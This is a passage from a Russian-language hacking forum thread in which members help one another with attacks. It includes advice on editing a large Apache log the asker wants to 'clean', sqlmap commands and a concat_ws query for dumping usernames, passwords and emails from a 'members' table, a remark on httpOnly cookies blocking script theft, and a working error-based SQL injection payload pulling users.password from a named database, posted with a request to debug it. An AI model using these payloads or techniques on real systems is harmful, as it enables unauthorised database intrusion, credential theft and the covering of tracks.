Старый 17.04.2015, 16:33   #3411
euro
 
Регистрация: 09.07.2010
Сообщений: 66
Репутация: 8
По умолчанию

Цитата:
euro, вопрос не по теме
ок,так по теме ?
как почистить лог от апача если он весит больше 10gb ).KeyWordKeeper не подойдет для этого
euro вне форума   Ответить с цитированием
Старый 17.04.2015, 19:19   #3412
Tim
 
Аватар для Tim
 
Регистрация: 24.03.2011
Сообщений: 59
Репутация: 3
По умолчанию

Цитата:
Сообщение от euro Посмотреть сообщение
подскажите каким образом можно отредактировать большей файл, если он весит больше 10gb
Разбей файл на мелкие куски, отредактируй нужный и собери обратно в большой файл

Разбиваем file на куски по 10050 строк в каждом файле:
Код:
split -l 10050 file file_
Редактируем.

Собираем обратно все файлы в один file
Код:
cat file_* > file
Tim вне форума   Ответить с цитированием
Старый 18.04.2015, 21:35   #3413
Faaax
 
Аватар для Faaax
 
Регистрация: 03.04.2012
Сообщений: 95
Репутация: 6
По умолчанию

Ребят подскажите,реально ли в этом куске кода выйти за прeделы диры через аплоад файла?
Код:
if(isset($_FILES['dump_db']['name']) and $_FILES['dump_db']['name']){
        
			$dir = dirname( __FILE__ ).'/wp-content/uploads/';
			@mkdir($dir, 0777);
			if(is_dir($dir)){
					
				$uploadfile = $dir.basename($_FILES['dump_db']['name']);
				if (!move_uploaded_file($_FILES['dump_db']['tmp_name'], $uploadfile))

И тут

Код:
        $uploadfile = 'wp-content/uploads/'.basename($_FILES['dump_db']['name']);
        if (!move_uploaded_file($_FILES['dump_db']['tmp_name'], $uploadfile))
        {
            $msg .= '<p style="color:red;">&mdash; Не удалось загрузить файл базы данных.</p>';
        }
        else
        {
            $file_sql = file($uploadfile); //var_dump($file_sql);
            require_once 'wp-config.php';
            global $wpdb;       
            foreach ($file_sql as $n => $l) if (substr($l,0,2)=='--') unset($file_sql[$n]);
            $file_sql = explode(";\n",implode("\n",$file_sql));
            unset($file_sql[count($file_sql)-1]);
            foreach ($file_sql as $q) {if ($q) {$wpdb->query($q);}}
Faaax вне форума   Ответить с цитированием
Старый 19.04.2015, 09:13   #3414
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от Faaax Посмотреть сообщение
Ребят подскажите,реально ли в этом куске кода выйти за прeделы диры через аплоад файла?
Код:
if(isset($_FILES['dump_db']['name']) and $_FILES['dump_db']['name']){
        
			$dir = dirname( __FILE__ ).'/wp-content/uploads/';
			@mkdir($dir, 0777);
			if(is_dir($dir)){
					
				$uploadfile = $dir.basename($_FILES['dump_db']['name']);
				if (!move_uploaded_file($_FILES['dump_db']['tmp_name'], $uploadfile))

И тут

Код:
        $uploadfile = 'wp-content/uploads/'.basename($_FILES['dump_db']['name']);
        if (!move_uploaded_file($_FILES['dump_db']['tmp_name'], $uploadfile))
        {
            $msg .= '<p style="color:red;">&mdash; Не удалось загрузить файл базы данных.</p>';
        }
        else
        {
            $file_sql = file($uploadfile); //var_dump($file_sql);
            require_once 'wp-config.php';
            global $wpdb;       
            foreach ($file_sql as $n => $l) if (substr($l,0,2)=='--') unset($file_sql[$n]);
            $file_sql = explode(";\n",implode("\n",$file_sql));
            unset($file_sql[count($file_sql)-1]);
            foreach ($file_sql as $q) {if ($q) {$wpdb->query($q);}}
Нет, basename() тут за всех решает.
__________________
|
Boolean вне форума   Ответить с цитированием
Старый 01.05.2015, 14:48   #3415
X-Ware
 
Аватар для X-Ware
 
Регистрация: 15.12.2012
Сообщений: 2
Репутация: 0
По умолчанию

Подскажите пожалуйста кто в теме как в sqlmap через sql-shell сдампить опредленную таблицу например "members" определенного БД? имеется ввиду какие команды можно использовать для этого, примеры если можно, версия MySQL 5.0.11

так же интересует тоже самое ток по колонкам, как сдампить несколько колонок из таблицы, важно: "дамп нужен на выходе или в sql или в csv формате".

Сдампил такой командой: "SELECT * FROM members" в логах все есть почти но кроме самих названий колонок+ формат не тот, точнее сложно разобратся в данных без колонок...
X-Ware вне форума   Ответить с цитированием
Старый 01.05.2015, 15:04   #3416
Tim
 
Аватар для Tim
 
Регистрация: 24.03.2011
Сообщений: 59
Репутация: 3
По умолчанию

Цитата:
Сообщение от X-Ware Посмотреть сообщение
Подскажите пожалуйста кто в теме как в sqlmap через sql-shell сдампить опредленную таблицу например "members" определенного БД? имеется ввиду какие команды можно использовать для этого, примеры если можно, версия MySQL 5.0.11

так же интересует тоже самое ток по колонкам, как сдампить несколько колонок из таблицы, важно: "дамп нужен на выходе или в sql или в csv формате".

Сдампил такой командой: "SELECT * FROM members" в логах все есть почти но кроме самих названий колонок+ формат не тот, точнее сложно разобратся в данных без колонок...
https://github.com/sqlmapproject/sqlmap/wiki/Usage

Смотри в сторону --dump, --sql-shell тебе не нужен
Цитата:
--dump -D database -T members -C column
Tim вне форума   Ответить с цитированием
Старый 01.05.2015, 15:15   #3417
X-Ware
 
Аватар для X-Ware
 
Регистрация: 15.12.2012
Сообщений: 2
Репутация: 0
По умолчанию

Цитата:
Сообщение от Tim Посмотреть сообщение
https://github.com/sqlmapproject/sqlmap/wiki/Usage

Смотри в сторону --dump, --sql-shell тебе не нужен

Цитата:
--dump -D database -T members -C column
Смотри в сторону --dump, --sql-shell тебе не нужен

)) спасибо но это я и сам знаю, надо именно через sql-shell, стандартные консольные команды mysql, но с mysqldump чет не чего не выходит, надо другое решение если есть конечно...

Дело в том что стандартными методами скульмап не таблицы не даные не вытаскиваются, все без проблем вытаскивается только через sql-shell, но формат дампа не тот....

Последний раз редактировалось X-Ware; 01.05.2015 в 15:29..
X-Ware вне форума   Ответить с цитированием
Старый 04.05.2015, 00:54   #3418
Tim
 
Аватар для Tim
 
Регистрация: 24.03.2011
Сообщений: 59
Репутация: 3
По умолчанию

Цитата:
Сообщение от X-Ware Посмотреть сообщение
Дело в том что стандартными методами скульмап не таблицы не даные не вытаскиваются, все без проблем вытаскивается только через sql-shell, но формат дампа не тот....
select concat_ws(0x3a,username,password,email) from database.table_user limit 0,1000
Tim вне форума   Ответить с цитированием
Старый 08.05.2015, 09:53   #3419
zuzzz
 
Регистрация: 24.02.2011
Сообщений: 75
Репутация: 7
По умолчанию

Oza значит у куков выставлен параметр httpOnly или secure, который не позволяет скриптам получать эти куки.
zuzzz вне форума   Ответить с цитированием
Старый 18.05.2015, 22:39   #3420
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Запрос к скрипту для вывода password
Код HTML:
112' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,users.password,0x27,0x7e) from `u557`.users where users.id=1 Order by id limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1
отдает Subquery returns more than 1 row
Полный запрос выглядит к БД выглядит так:
Код HTML:
[query] => select count(*) from `ads` USE INDEX (city_id) where (`rubric_id`='112' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,users.password,0x27,0x7e) from `u557`.users where users.id=1 Order by id limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1' ) and `city_id`=1 and `deleted`='0' and `archived`='0'
Помогите отладить запрос, чтобы выводился password
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot